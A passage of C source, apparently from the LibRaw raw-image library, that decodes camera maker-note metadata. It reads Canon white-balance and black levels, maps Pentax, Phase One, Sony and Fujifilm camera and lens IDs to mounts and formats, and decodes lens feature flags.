imgdata.makernotes.canon.CanonColorDataVer = 3; // 1DmkIIN / 5D / 30D / 400D
imgdata.makernotes.canon.CanonColorDataSubVer = get2();
{
fseek (ifp, save1+(0x4e<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0x85<<1), SEEK_SET);
Canon_WBCTpresets (0); // BCAT
fseek (ifp, save1+(0x0c4<<1), SEEK_SET); // offset 196 short
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
break;
// 1DmkIII / 1DSmkIII / 1DmkIV / 5DmkII
// 7D / 40D / 50D / 60D / 450D / 500D
// 550D / 1000D / 1100D
case 674: case 692: case 702: case 1227: case 1250:
case 1251: case 1337: case 1338: case 1346:
imgdata.makernotes.canon.CanonColorDataVer = 4;
imgdata.makernotes.canon.CanonColorDataSubVer = get2();
{
fseek (ifp, save1+(0x53<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0xa8<<1), SEEK_SET);
Canon_WBCTpresets (0); // BCAT
fseek (ifp, save1+(0x0e7<<1), SEEK_SET); // offset 231 short
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
if ((imgdata.makernotes.canon.CanonColorDataSubVer == 4)
|| (imgdata.makernotes.canon.CanonColorDataSubVer == 5))
{
fseek (ifp, save1+(0x2b9<<1), SEEK_SET); // offset 697 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
else if ((imgdata.makernotes.canon.CanonColorDataSubVer == 6) ||
(imgdata.makernotes.canon.CanonColorDataSubVer == 7))
{
fseek (ifp, save1+(0x2d0<<1), SEEK_SET); // offset 720 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
else if (imgdata.makernotes.canon.CanonColorDataSubVer == 9)
{
fseek (ifp, save1+(0x2d4<<1), SEEK_SET); // offset 724 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
break;
case 5120:
imgdata.makernotes.canon.CanonColorDataVer = 5; // PowerShot G10, G12, G5 X, EOS M3, EOS M5
{
fseek (ifp, save1+(0x56<<1), SEEK_SET);
if ((unique_id == 0x03970000) || // G7 X Mark II
(unique_id == 0x80000394)) // EOS M5
{
fseek(ifp, 18, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Other][c ^ (c >> 1)] = get2();
fseek(ifp, 8, SEEK_CUR);
Canon_WBpresets(8,24);
fseek(ifp, 168, SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][c ^ (c >> 1)] = get2();
fseek(ifp, 24, SEEK_CUR);
Canon_WBCTpresets (2); // BCADT
fseek(ifp, 6, SEEK_CUR);
}
else
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Other][c ^ (c >> 1)] = get2();
get2();
Canon_WBpresets(2,12);
fseek (ifp, save1+(0xba<<1), SEEK_SET);
Canon_WBCTpresets (2); // BCADT
fseek (ifp, save1+(0x108<<1), SEEK_SET); // offset 264 short
}
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
break;
case 1273: case 1275:
imgdata.makernotes.canon.CanonColorDataVer = 6; // 600D / 1200D
imgdata.makernotes.canon.CanonColorDataSubVer = get2();
{
fseek (ifp, save1+(0x67<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0xbc<<1), SEEK_SET);
Canon_WBCTpresets (0); // BCAT
fseek (ifp, save1+(0x0fb<<1), SEEK_SET); // offset 251 short
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
fseek (ifp, save1+(0x1e4<<1), SEEK_SET); // offset 484 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
break;
// 1DX / 5DmkIII / 6D / 100D / 650D / 700D / EOS M / 7DmkII / 750D / 760D
case 1312: case 1313: case 1316: case 1506:
imgdata.makernotes.canon.CanonColorDataVer = 7;
imgdata.makernotes.canon.CanonColorDataSubVer = get2();
{
fseek (ifp, save1+(0x80<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0xd5<<1), SEEK_SET);
Canon_WBCTpresets (0); // BCAT
fseek (ifp, save1+(0x114<<1), SEEK_SET); // offset 276 shorts
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
if (imgdata.makernotes.canon.CanonColorDataSubVer == 10)
{
fseek (ifp, save1+(0x1fd<<1), SEEK_SET); // offset 509 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
} else if (imgdata.makernotes.canon.CanonColorDataSubVer == 11)
{
fseek (ifp, save1+(0x2dd<<1), SEEK_SET); // offset 733 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
break;
// 5DS / 5DS R / 80D / 1300D / 5D4
case 1560: case 1592: case 1353:
imgdata.makernotes.canon.CanonColorDataVer = 8;
imgdata.makernotes.canon.CanonColorDataSubVer = get2();
{
fseek (ifp, save1+(0x85<<1), SEEK_SET);
Canon_WBpresets(2,12);
fseek (ifp, save1+(0x107<<1), SEEK_SET);
Canon_WBCTpresets (0); // BCAT
fseek (ifp, save1+(0x146<<1), SEEK_SET); // offset 326 shorts
int bls=0;
FORC4
bls+= (imgdata.makernotes.canon.ChannelBlackLevel[c]=get2());
imgdata.makernotes.canon.AverageBlackLevel = bls/4;
}
if (imgdata.makernotes.canon.CanonColorDataSubVer == 14) // 1300D
{
fseek (ifp, save1+(0x231<<1), SEEK_SET);
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
else
{
fseek (ifp, save1+(0x30f<<1), SEEK_SET); // offset 783 shorts
imgdata.makernotes.canon.SpecularWhiteLevel = get2();
FORC4 imgdata.color.linear_max[c] = imgdata.makernotes.canon.SpecularWhiteLevel;
}
break;
}
fseek (ifp, save1, SEEK_SET);
}
}
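// Map a Pentax body ID to its mount (K, 645 or Q) and sensor format;
// unknown IDs are treated as fixed-lens cameras.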
void CLASS setPentaxBodyFeatures (unsigned id)
{
imgdata.lens.makernotes.CamID = id;
switch (id) {
case 0x12994:
case 0x12aa2:
case 0x12b1a:
case 0x12b60:
case 0x12b62:
case 0x12b7e:
case 0x12b80:
case 0x12b9c:
case 0x12b9d:
case 0x12ba2:
case 0x12c1e:
case 0x12c20:
case 0x12cd2:
case 0x12cd4:
case 0x12cfa:
case 0x12d72:
case 0x12d73:
case 0x12db8:
case 0x12dfe:
case 0x12e6c:
case 0x12e76:
case 0x12ef8:
case 0x12f52:
case 0x12f70:
case 0x12f71:
case 0x12fb6:
case 0x12fc0:
case 0x12fca:
case 0x1301a:
case 0x13024:
case 0x1309c:
case 0x13222:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Pentax_K;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Pentax_K;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
break;
case 0x13092:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Pentax_K;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Pentax_K;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_FF;
break;
case 0x12e08:
case 0x13010:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Pentax_645;
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_MF;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Pentax_645;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_MF;
break;
case 0x12ee4:
case 0x12f66:
case 0x12f7a:
case 0x1302e:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Pentax_Q;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Pentax_Q;
break;
default:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
return;
}
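// Translate a Pentax ISO code into an ISO speed using the parallel
// code[]/value[] tables below; codes not found in the table map to 65535.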
void CLASS PentaxISO (ushort c)
{
int code [] = {3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 50, 100, 200, 400, 800, 1600, 3200, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278};
double value [] = {50, 64, 80, 100, 125, 160, 200, 250, 320, 400, 500, 640, 800, 1000, 1250, 1600, 2000, 2500, 3200, 4000, 5000, 6400, 8000, 10000, 12800, 16000, 20000, 25600, 32000, 40000, 51200, 64000, 80000, 102400, 128000, 160000, 204800, 50, 100, 200, 400, 800, 1600, 3200, 50, 70, 100, 140, 200, 280, 400, 560, 800, 1100, 1600, 2200, 3200, 4500, 6400, 9000, 12800, 18000, 25600, 36000, 51200};
#define numel (sizeof(code)/sizeof(code[0]))
int i;
for (i = 0; i < numel; i++) {
if (code[i] == c) {
iso_speed = value[i];
return;
}
}
iso_speed = 65535.0f; // loop completed without a match: unknown ISO code
}
#undef numel
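// Parse Pentax LensInfo (tag 0x0207): choose the table layout from the blob
// length and body ID, then extract the lens ID, focal length and aperture limits.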
void CLASS PentaxLensInfo (unsigned id, unsigned len) // tag 0x0207
{
ushort iLensData = 0;
uchar *table_buf;
table_buf = (uchar*)malloc(MAX(len,128));
fread(table_buf, len, 1, ifp);
if ((id < 0x12b9c) ||
(((id == 0x12b9c) || // K100D
(id == 0x12b9d) || // K110D
(id == 0x12ba2)) && // K100D Super
((!table_buf[20] ||
(table_buf[20] == 0xff)))))
{
iLensData = 3;
if (imgdata.lens.makernotes.LensID == -1)
imgdata.lens.makernotes.LensID =
(((unsigned)table_buf[0]) << 8) + table_buf[1];
}
else switch (len)
{
case 90: // LensInfo3
iLensData = 13;
if (imgdata.lens.makernotes.LensID == -1)
imgdata.lens.makernotes.LensID =
((unsigned)((table_buf[1] & 0x0f) + table_buf[3]) <<8) + table_buf[4];
break;
case 91: // LensInfo4
iLensData = 12;
if (imgdata.lens.makernotes.LensID == -1)
imgdata.lens.makernotes.LensID =
((unsigned)((table_buf[1] & 0x0f) + table_buf[3]) <<8) + table_buf[4];
break;
case 80: // LensInfo5
case 128:
iLensData = 15;
if (imgdata.lens.makernotes.LensID == -1)
imgdata.lens.makernotes.LensID =
((unsigned)((table_buf[1] & 0x0f) + table_buf[4]) <<8) + table_buf[5];
break;
default:
if (id >= 0x12b9c) // LensInfo2
{
iLensData = 4;
if (imgdata.lens.makernotes.LensID == -1)
imgdata.lens.makernotes.LensID =
((unsigned)((table_buf[0] & 0x0f) + table_buf[2]) <<8) + table_buf[3];
}
}
if (iLensData)
{
if (table_buf[iLensData+9] &&
(fabs(imgdata.lens.makernotes.CurFocal) < 0.1f))
imgdata.lens.makernotes.CurFocal =
10*(table_buf[iLensData+9]>>2) * libraw_powf64(4, (table_buf[iLensData+9] & 0x03)-2);
if (table_buf[iLensData+10] & 0xf0)
imgdata.lens.makernotes.MaxAp4CurFocal =
libraw_powf64(2.0f, (float)((table_buf[iLensData+10] & 0xf0) >>4)/4.0f);
if (table_buf[iLensData+10] & 0x0f)
imgdata.lens.makernotes.MinAp4CurFocal =
libraw_powf64(2.0f, (float)((table_buf[iLensData+10] & 0x0f) + 10)/4.0f);
if (iLensData != 12)
{
switch (table_buf[iLensData] & 0x06)
{
case 0: imgdata.lens.makernotes.MinAp4MinFocal = 22.0f; break;
case 2: imgdata.lens.makernotes.MinAp4MinFocal = 32.0f; break;
case 4: imgdata.lens.makernotes.MinAp4MinFocal = 45.0f; break;
case 6: imgdata.lens.makernotes.MinAp4MinFocal = 16.0f; break;
}
if (table_buf[iLensData] & 0x70)
imgdata.lens.makernotes.LensFStops =
((float)(((table_buf[iLensData] & 0x70) >> 4) ^ 0x07)) / 2.0f + 5.0f;
imgdata.lens.makernotes.MinFocusDistance = (float)(table_buf[iLensData+3] & 0xf8);
imgdata.lens.makernotes.FocusRangeIndex = (float)(table_buf[iLensData+3] & 0x07);
if ((table_buf[iLensData+14] > 1) &&
(fabs(imgdata.lens.makernotes.MaxAp4CurFocal) < 0.7f))
imgdata.lens.makernotes.MaxAp4CurFocal =
libraw_powf64(2.0f, (float)((table_buf[iLensData+14] & 0x7f) -1)/32.0f);
}
else if ((id != 0x12e76) && // K-5
(table_buf[iLensData+15] > 1) &&
(fabs(imgdata.lens.makernotes.MaxAp4CurFocal) < 0.7f))
{
imgdata.lens.makernotes.MaxAp4CurFocal =
libraw_powf64(2.0f, (float)((table_buf[iLensData+15] & 0x7f) -1)/32.0f);
}
}
free(table_buf);
return;
}
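// Map a Phase One / Leaf back ID to the host body name via the p1_unique table below.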
void CLASS setPhaseOneFeatures (unsigned id) {
ushort i;
static const struct {
ushort id;
char t_model[32];
} p1_unique[] = {
// Phase One section:
{1, "Hasselblad V"},
{10, "PhaseOne/Mamiya"},
{12, "Contax 645"},
{16, "Hasselblad V"},
{17, "Hasselblad V"},
{18, "Contax 645"},
{19, "PhaseOne/Mamiya"},
{20, "Hasselblad V"},
{21, "Contax 645"},
{22, "PhaseOne/Mamiya"},
{23, "Hasselblad V"},
{24, "Hasselblad H"},
{25, "PhaseOne/Mamiya"},
{32, "Contax 645"},
{34, "Hasselblad V"},
{35, "Hasselblad V"},
{36, "Hasselblad H"},
{37, "Contax 645"},
{38, "PhaseOne/Mamiya"},
{39, "Hasselblad V"},
{40, "Hasselblad H"},
{41, "Contax 645"},
{42, "PhaseOne/Mamiya"},
{44, "Hasselblad V"},
{45, "Hasselblad H"},
{46, "Contax 645"},
{47, "PhaseOne/Mamiya"},
{48, "Hasselblad V"},
{49, "Hasselblad H"},
{50, "Contax 645"},
{51, "PhaseOne/Mamiya"},
{52, "Hasselblad V"},
{53, "Hasselblad H"},
{54, "Contax 645"},
{55, "PhaseOne/Mamiya"},
{67, "Hasselblad V"},
{68, "Hasselblad H"},
{69, "Contax 645"},
{70, "PhaseOne/Mamiya"},
{71, "Hasselblad V"},
{72, "Hasselblad H"},
{73, "Contax 645"},
{74, "PhaseOne/Mamiya"},
{76, "Hasselblad V"},
{77, "Hasselblad H"},
{78, "Contax 645"},
{79, "PhaseOne/Mamiya"},
{80, "Hasselblad V"},
{81, "Hasselblad H"},
{82, "Contax 645"},
{83, "PhaseOne/Mamiya"},
{84, "Hasselblad V"},
{85, "Hasselblad H"},
{86, "Contax 645"},
{87, "PhaseOne/Mamiya"},
{99, "Hasselblad V"},
{100, "Hasselblad H"},
{101, "Contax 645"},
{102, "PhaseOne/Mamiya"},
{103, "Hasselblad V"},
{104, "Hasselblad H"},
{105, "PhaseOne/Mamiya"},
{106, "Contax 645"},
{112, "Hasselblad V"},
{113, "Hasselblad H"},
{114, "Contax 645"},
{115, "PhaseOne/Mamiya"},
{131, "Hasselblad V"},
{132, "Hasselblad H"},
{133, "Contax 645"},
{134, "PhaseOne/Mamiya"},
{135, "Hasselblad V"},
{136, "Hasselblad H"},
{137, "Contax 645"},
{138, "PhaseOne/Mamiya"},
{140, "Hasselblad V"},
{141, "Hasselblad H"},
{142, "Contax 645"},
{143, "PhaseOne/Mamiya"},
{148, "Hasselblad V"},
{149, "Hasselblad H"},
{150, "Contax 645"},
{151, "PhaseOne/Mamiya"},
{160, "A-250"},
{161, "A-260"},
{162, "A-280"},
{167, "Hasselblad V"},
{168, "Hasselblad H"},
{169, "Contax 645"},
{170, "PhaseOne/Mamiya"},
{172, "Hasselblad V"},
{173, "Hasselblad H"},
{174, "Contax 645"},
{175, "PhaseOne/Mamiya"},
{176, "Hasselblad V"},
{177, "Hasselblad H"},
{178, "Contax 645"},
{179, "PhaseOne/Mamiya"},
{180, "Hasselblad V"},
{181, "Hasselblad H"},
{182, "Contax 645"},
{183, "PhaseOne/Mamiya"},
{208, "Hasselblad V"},
{211, "PhaseOne/Mamiya"},
{448, "Phase One 645AF"},
{457, "Phase One 645DF"},
{471, "Phase One 645DF+"},
{704, "Phase One iXA"},
{705, "Phase One iXA - R"},
{706, "Phase One iXU 150"},
{707, "Phase One iXU 150 - NIR"},
{708, "Phase One iXU 180"},
{721, "Phase One iXR"},
// Leaf section:
{333,"Mamiya"},
{329,"Universal"},
{330,"Hasselblad H1/H2"},
{332,"Contax"},
{336,"AFi"},
{327,"Mamiya"},
{324,"Universal"},
{325,"Hasselblad H1/H2"},
{326,"Contax"},
{335,"AFi"},
{340,"Mamiya"},
{337,"Universal"},
{338,"Hasselblad H1/H2"},
{339,"Contax"},
{323,"Mamiya"},
{320,"Universal"},
{322,"Hasselblad H1/H2"},
{321,"Contax"},
{334,"AFi"},
{369,"Universal"},
{370,"Mamiya"},
{371,"Hasselblad H1/H2"},
{372,"Contax"},
{373,"Afi"},
};
imgdata.lens.makernotes.CamID = id;
if (id && !imgdata.lens.makernotes.body[0]) {
for (i=0; i < sizeof p1_unique / sizeof *p1_unique; i++)
if (id == p1_unique[i].id) {
strcpy(imgdata.lens.makernotes.body,p1_unique[i].t_model);
}
}
return;
}
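// Decode a single Fujifilm MakerNote tag into the fuji makernotes and lens fields.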
void CLASS parseFujiMakernotes (unsigned tag, unsigned type) {
switch (tag) {
case 0x1002: imgdata.makernotes.fuji.WB_Preset = get2(); break;
case 0x1011: imgdata.other.FlashEC = getreal(type); break;
case 0x1020: imgdata.makernotes.fuji.Macro = get2(); break;
case 0x1021: imgdata.makernotes.fuji.FocusMode = get2(); break;
case 0x1022: imgdata.makernotes.fuji.AFMode = get2(); break;
case 0x1023: imgdata.makernotes.fuji.FocusPixel[0] = get2();
imgdata.makernotes.fuji.FocusPixel[1] = get2();
break;
case 0x1034: imgdata.makernotes.fuji.ExrMode = get2(); break;
case 0x1050: imgdata.makernotes.fuji.ShutterType = get2(); break;
case 0x1400: imgdata.makernotes.fuji.FujiDynamicRange = get2(); break;
case 0x1401: imgdata.makernotes.fuji.FujiFilmMode = get2(); break;
case 0x1402: imgdata.makernotes.fuji.FujiDynamicRangeSetting = get2(); break;
case 0x1403: imgdata.makernotes.fuji.FujiDevelopmentDynamicRange = get2(); break;
case 0x140b: imgdata.makernotes.fuji.FujiAutoDynamicRange = get2(); break;
case 0x1404: imgdata.lens.makernotes.MinFocal = getreal(type); break;
case 0x1405: imgdata.lens.makernotes.MaxFocal = getreal(type); break;
case 0x1406: imgdata.lens.makernotes.MaxAp4MinFocal = getreal(type); break;
case 0x1407: imgdata.lens.makernotes.MaxAp4MaxFocal = getreal(type); break;
case 0x1422: imgdata.makernotes.fuji.ImageStabilization[0] = get2();
imgdata.makernotes.fuji.ImageStabilization[1] = get2();
imgdata.makernotes.fuji.ImageStabilization[2] = get2();
imgdata.shootinginfo.ImageStabilization = (imgdata.makernotes.fuji.ImageStabilization[0]<<9) + imgdata.makernotes.fuji.ImageStabilization[1];
break;
case 0x1431: imgdata.makernotes.fuji.Rating = get4(); break;
case 0x3820: imgdata.makernotes.fuji.FrameRate = get2(); break;
case 0x3821: imgdata.makernotes.fuji.FrameWidth = get2(); break;
case 0x3822: imgdata.makernotes.fuji.FrameHeight = get2(); break;
}
return;
}
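// Map a Sony body ID to sensor format (FF / 1-inch / APS-C), camera mount
// (E or A) and camera family (ILCE, NEX, DSLR, SLT, ILCA, DSC).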
void CLASS setSonyBodyFeatures (unsigned id) {
imgdata.lens.makernotes.CamID = id;
if ( // FF cameras
(id == 257) || // a900
(id == 269) || // a850
(id == 340) || // ILCE-7M2
(id == 318) || // ILCE-7S
(id == 350) || // ILCE-7SM2
(id == 311) || // ILCE-7R
(id == 347) || // ILCE-7RM2
(id == 306) || // ILCE-7
(id == 298) || // DSC-RX1
(id == 299) || // NEX-VG900
(id == 310) || // DSC-RX1R
(id == 344) || // DSC-RX1RM2
(id == 354) || // ILCA-99M2
(id == 294) // SLT-A99, Hasselblad HV
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_FF;
}
else if ((id == 297) || // DSC-RX100
(id == 308) || // DSC-RX100M2
(id == 309) || // DSC-RX10
(id == 317) || // DSC-RX100M3
(id == 341) || // DSC-RX100M4
(id == 342) || // DSC-RX10M2
(id == 355) || // DSC-RX10M3
(id == 356) // DSC-RX100M5
)
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_1INCH;
}
else if (id != 002) // DSC-R1
{
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
}
if ( // E-mount cameras, ILCE series
(id == 302) ||
(id == 306) ||
(id == 311) ||
(id == 312) ||
(id == 313) ||
(id == 318) ||
(id == 339) ||
(id == 340) ||
(id == 346) ||
(id == 347) ||
(id == 350) ||
(id == 360)
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Sony_E;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_ILCE;
}
else if ( // E-mount cameras, NEX series
(id == 278) ||
(id == 279) ||
(id == 284) ||
(id == 288) ||
(id == 289) ||
(id == 290) ||
(id == 293) ||
(id == 295) ||
(id == 296) ||
(id == 299) ||
(id == 300) ||
(id == 305) ||
(id == 307)
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Sony_E;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_NEX;
}
else if ( // A-mount cameras, DSLR series
(id == 256) ||
(id == 257) ||
(id == 258) ||
(id == 259) ||
(id == 260) ||
(id == 261) ||
(id == 262) ||
(id == 263) ||
(id == 264) ||
(id == 265) ||
(id == 266) ||
(id == 269) ||
(id == 270) ||
(id == 273) ||
(id == 274) ||
(id == 275) ||
(id == 282) ||
(id == 283)
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Minolta_A;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_DSLR;
}
else if ( // A-mount cameras, SLT series
(id == 280) ||
(id == 281) ||
(id == 285) ||
(id == 286) ||
(id == 287) ||
(id == 291) ||
(id == 292) ||
(id == 294) ||
(id == 303)
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Minolta_A;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_SLT;
}
else if ( // A-mount cameras, ILCA series
(id == 319) ||
(id == 353) ||
(id == 354)
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Minolta_A;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_ILCA;
}
else if ( // DSC
(id == 002) || // DSC-R1
(id == 297) || // DSC-RX100
(id == 298) || // DSC-RX1
(id == 308) || // DSC-RX100M2
(id == 309) || // DSC-RX10
(id == 310) || // DSC-RX1R
(id == 344) || // DSC-RX1RM2
(id == 317) || // DSC-RX100M3
(id == 341) || // DSC-RX100M4
(id == 342) || // DSC-RX10M2
(id == 355) || // DSC-RX10M3
(id == 356) // DSC-RX100M5
)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.makernotes.sony.SonyCameraType = LIBRAW_SONY_DSC;
}
return;
}
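// Decode Sony LensType2: values below 0x100 identify an adapter (and imply the
// native mount of the adapted lens), larger values are lens IDs; values in the
// 50481..50499 range indicate a Sigma MC-11 adapter.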
void CLASS parseSonyLensType2 (uchar a, uchar b) {
ushort lid2;
lid2 = (((ushort)a)<<8) | ((ushort)b);
if (!lid2) return;
if (lid2 < 0x100)
{
if ((imgdata.lens.makernotes.AdapterID != 0x4900) &&
(imgdata.lens.makernotes.AdapterID != 0xEF00))
{
imgdata.lens.makernotes.AdapterID = lid2;
switch (lid2) {
case 1:
case 2:
case 3:
case 6:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Minolta_A;
break;
case 44:
case 78:
case 239:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
break;
}
}
}
else
imgdata.lens.makernotes.LensID = lid2;
if ((lid2 >= 50481) && (lid2 < 50500))
{
strcpy(imgdata.lens.makernotes.Adapter, "MC-11");
imgdata.lens.makernotes.AdapterID = 0x4900;
}
return;
}
#define strnXcat(buf,string) strncat(buf,string,LIM(sizeof(buf)-strbuflen(buf)-1,0,sizeof(buf)))
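// Decode the Sony lens-features bitmask into the "E"/"FE"/"DT" prefix and the
// G/ZA/Macro/STF/OSS/etc. suffixes, and infer lens format and mount when they
// are not known yet. strnXcat above is a bounds-checked strncat.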
void CLASS parseSonyLensFeatures (uchar a, uchar b) {
ushort features;
features = (((ushort)a)<<8) | ((ushort)b);
if ((imgdata.lens.makernotes.LensMount == LIBRAW_MOUNT_Canon_EF) ||
(imgdata.lens.makernotes.LensMount == LIBRAW_MOUNT_Sigma_X3F) ||
!features)
return;
imgdata.lens.makernotes.LensFeatures_pre[0] = 0;
imgdata.lens.makernotes.LensFeatures_suf[0] = 0;
if ((features & 0x0200) && (features & 0x0100)) strcpy(imgdata.lens.makernotes.LensFeatures_pre, "E");
else if (features & 0x0200) strcpy(imgdata.lens.makernotes.LensFeatures_pre, "FE");
else if (features & 0x0100) strcpy(imgdata.lens.makernotes.LensFeatures_pre, "DT");
if (!imgdata.lens.makernotes.LensFormat && !imgdata.lens.makernotes.LensMount)
{
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_FF;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Minolta_A;
if ((features & 0x0200) && (features & 0x0100)) {
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_APSC;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sony_E;
} else if (features & 0x0200) {
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sony_E;
} else if (features & 0x0100) {
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_APSC;
}
}
if (features & 0x4000)
strnXcat(imgdata.lens.makernotes.LensFeatures_pre, " PZ");
if (features & 0x0008)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " G");
else if (features & 0x0004)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " ZA" );
if ((features & 0x0020) && (features & 0x0040))
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " Macro");
else if (features & 0x0020)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " STF");
else if (features & 0x0040)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " Reflex");
else if (features & 0x0080)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " Fisheye");
if (features & 0x0001)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " SSM");
else if (features & 0x0002)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " SAM");
if (features & 0x8000)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " OSS");
if (features & 0x2000)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " LE");
if (features & 0x0800)
strnXcat(imgdata.lens.makernotes.LensFeatures_suf, " II");
if (imgdata.lens.makernotes.LensFeatures_suf[0] == ' ')
memmove(imgdata.lens.makernotes.LensFeatures_suf, imgdata.lens.makernotes.LensFeatures_suf+1,
strbuflen(imgdata.lens.makernotes.LensFeatures_suf)-1);
return;
}
#undef strnXcat
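// Tag 0x940c (obfuscated with the SonySubstitution table): lens mount byte at
// offset 8 and LensType2 at offsets 9-10.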
void CLASS process_Sony_0x940c (uchar * buf)
{
ushort lid2;
if ((imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Canon_EF) &&
(imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Sigma_X3F))
{
switch (SonySubstitution[buf[0x0008]]) {
case 1:
case 5:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Minolta_A;
break;
case 4:
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sony_E;
break;
}
}
lid2 = (((ushort)SonySubstitution[buf[0x000a]])<<8) |
((ushort)SonySubstitution[buf[0x0009]]);
if ((lid2 > 0) && (lid2 < 32784))
parseSonyLensType2 (SonySubstitution[buf[0x000a]], // LensType2 - Sony lens ids
SonySubstitution[buf[0x0009]]);
return;
}
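// Tag 0x9050 (obfuscated with the SonySubstitution table): aperture limits,
// current aperture, lens mount/format, LensType/LensType2 and the internal
// body serial, with offsets that depend on the body ID.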
void CLASS process_Sony_0x9050 (uchar * buf, unsigned id)
{
ushort lid;
if ((imgdata.lens.makernotes.CameraMount != LIBRAW_MOUNT_Sony_E) &&
(imgdata.lens.makernotes.CameraMount != LIBRAW_MOUNT_FixedLens))
{
if (buf[0])
imgdata.lens.makernotes.MaxAp4CurFocal =
my_roundf(libraw_powf64(2.0f, ((float)SonySubstitution[buf[0]] / 8.0 - 1.06f) / 2.0f)*10.0f) / 10.0f;
if (buf[1])
imgdata.lens.makernotes.MinAp4CurFocal =
